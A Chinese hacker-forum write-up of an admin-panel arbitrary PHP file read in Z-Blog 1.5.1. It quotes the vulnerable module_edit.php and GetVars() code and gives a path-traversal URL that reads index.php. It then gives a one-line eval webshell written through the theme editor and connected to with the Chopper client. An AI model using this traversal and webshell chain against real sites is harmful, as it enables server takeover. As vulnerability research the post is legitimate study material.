[WEB]Z-Blog博客系统后台任意文件读取 - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C
网络爱好者的栖息之地,让我们的网络技术更上一层楼!!!

[WEB]Z-Blog博客系统后台任意文件读取

无法 动画教程
作者:only-wait

00x01 起因

    人一到了晚上精神越来越好,白天审计不到的洞晚上都来了

00x02 经过

    下载了这套博客系统之后,顺便进去看了看后台管理页面,看到了一些东西,进入了模板编辑处,看到可以编辑等等系列的东西

      1493728671808633.png

可以看到这里可以编辑一些信息,我们跟踪到/zb_system/admin/module_edit.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
if (isset($_GET['source'])) {
    if (GetVars('source''GET') == 'theme') {
        $mod new Module;
        $mod->Name = GetVars('filename''GET');
        $mod->FileName = GetVars('filename''GET');
        $mod->HtmlID = GetVars('filename''GET');
        $mod->Source = 'theme';
        if ($mod->FileName) {
            $mod->Content = file_get_contents($zbp->usersdir . 'theme/' $zbp->theme . '/include/' $mod->FileName . '.php');
        }
    }
elseif (isset($_GET['filename'])) {
    $array $zbp->GetModuleList(
        array('*'),
        array(array('=''mod_FileName', GetVars('filename''GET'))),
        null,
        array(1),
        null
    );

可以看到上面只要设置了source之后就可以继续进入下一层判断,我们继续,这里遇到了一个GetVars()函数,我们定位一下这个函数,函数在/zb_system/function/c_system_common.php这个文件中,代码如下:

1
2
3
4
5
6
7
8
function GetVars($name$type 'REQUEST') {
    $array = &$GLOBALS[strtoupper("_$type")];
    if (isset($array[$name])) {
        return $array[$name];
    else {
        return null;
    }
}

这里并没有对我们的传值进行任何的过滤,只是简单的判断了一下是什么方式传值,随后返回这个数组,我们继续来看,下面都是给变量赋值,赋值之后接着进行下一层的判断,这里判断是否给$mod->FileName赋值,只要我们在url上给它一个filename=../../../../index即可,接着判断通过看到一个名为file_get_contents()的函数,这个函数是读取文件用的,之后连接下来,就到了读取文件的位置这个地方了,后缀被固定为了php,所以我们可以读取任意php文件。

00x03 任意文件读取并GETSHELL

    现在我们构造下url,http://localhost/z-blogPHP_v1.5.1.zero/zb_system/admin/module_edit.php?source=theme&filename=../../../../index,我们构造这个就读取到了index.php的代码

    1493730085349605.png

我们就这样读取到了他的源码,同时在它的编辑处编写一句话进去,

1
@eval($_POST["w"]);

    1493730951812416.png

/zb_users/theme/default/include/........index.php我们的一句话写进了这个文件,因为我们构造的url中filename是../../../../index,所以写入文件的时候文件名就变成了........index.php

接着我们用菜刀来连接下........index.php这个文件

    1493730993332606.png


标签: 暂无标签

免责声明:

本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:22365412@qq.com

同类推荐
评论列表

    大仙儿  沙发 发表于2018-03-01 22:41 @回复
    [愤怒]